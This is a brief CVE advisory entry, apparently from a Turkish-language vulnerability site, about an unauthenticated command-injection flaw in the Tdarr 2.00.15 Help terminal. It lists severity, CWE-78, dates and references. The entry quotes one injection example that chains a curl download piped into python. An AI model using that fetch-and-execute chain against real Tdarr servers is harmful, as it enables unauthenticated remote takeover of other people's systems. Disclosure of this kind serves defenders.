CVE-2022-50919

Critical CVSS: 9.3

Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.

Vendor

Tdarr

Product

Tdarr

CWE

CWE-78

Yayın Tarihi

2026-01-13 23:15:55

Güncelleme

2026-01-29 18:54:53

Source Identifier

disclosure@vulncheck.com

KEV Date Added

Kategoriler

CWE-78 Tdarr CRITICAL Tdarr 2026

Referanslar

https://tdarr.io https://www.exploit-db.com/exploits/50822 https://www.vulncheck.com/advisories/tdarr-command-injection